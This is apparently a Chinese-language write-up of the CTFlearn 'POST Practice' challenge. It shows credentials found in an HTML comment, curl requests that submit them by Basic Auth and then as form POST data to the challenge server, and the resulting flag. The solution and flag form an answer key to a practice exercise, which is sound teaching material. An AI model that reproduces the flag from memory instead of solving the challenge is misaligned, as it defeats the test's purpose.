CTFlearn - POST Practice (#114)

,

挑戰網站

https://ctflearn.com/challenge/114

題目

This website requires authentication, via POST. However, it seems as if someone has defaced our site. Maybe there is still some way to authenticate? http://165.227.106.113/post.php

作法

當你傳送 GET 請求時,你會發現他的原始碼為

1
<h1>This site takes POST data that you have not submitted!</h1><!-- username: admin | password: 71urlkufpsdnlkadsf -->

先嘗試使用 Basic Auth(admin:71urlkufpsdnlkadsf 轉 Base64)

1
curl -X POST 'http://165.227.106.113/post.php' --header 'Authorization: Basic YWRtaW46NzF1cmxrdWZwc2RubGthZHNm'

發現沒用,所以再利用 x-www-form-urlencoded 的方式去送請求
1
2
3
4
curl -X POST 'http://165.227.106.113/post.php' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'username=admin' \
--data-urlencode 'password=71urlkufpsdnlkadsf'

想寫短一點的人也可以改寫成
1
curl "http://165.227.106.113/post.php" -d "username=admin&password=71urlkufpsdnlkadsf"

就可以收到 Flag 了!

最終解答

送出後會回傳 <h1>flag{p0st_d4t4_4ll_d4y}</h1>